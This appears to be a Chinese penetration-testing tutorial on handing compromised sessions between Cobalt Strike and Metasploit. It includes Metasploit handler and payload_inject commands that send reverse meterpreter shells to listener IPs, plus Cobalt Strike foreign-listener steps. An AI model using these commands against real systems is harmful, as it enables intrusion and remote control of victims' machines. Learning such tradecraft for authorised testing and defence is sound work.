当获取了CobaltStrike类型的session后,想派生一个MSF类型的shell
当获取了MSF类型的session后,想派生一个CobaltStrike类型的shell
当获取了CobaltStrike类型的session后,想派生一个MSF类型的shell
在MSF上的操作:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.10.11
set lport 4444
exploit -j
在CobaltStrike上的操作
这里一定要注意,创建的Listener是foreign!
然后选中计算机,右键->Spawn,选择刚刚创建的监听器MSF,然后我们的MSF即可看到成功获取了meterpreter会话
当获取了MSF类型的session后,想派生一个CobaltStrike类型的shell
注:只有meterpreter类型的session才能派生给CS
我们现在获得了一个MSF的meterpreter类型的session,session id为1
首先在CobaltStrike上开启Listener,
然后在MSF中进行如下操作
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true #默认情况下,payload_inject执行之后会在本地产生一个新的handler,由于我们已经有了一个,所以不需要在产生一个,所以这里我们设置为true
set lhost 48.94.225.140 #cobaltstrike监听的ip
set lport 14444 #cobaltstrike监听的端口
set session 1 #这里是获得的session的id
exploit
这样,我们的CobaltStrike上就可以收到MSF弹回来的session了。
本文始发于微信公众号(谢公子学安全):内网渗透|MSF和CobaltStrike联动
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论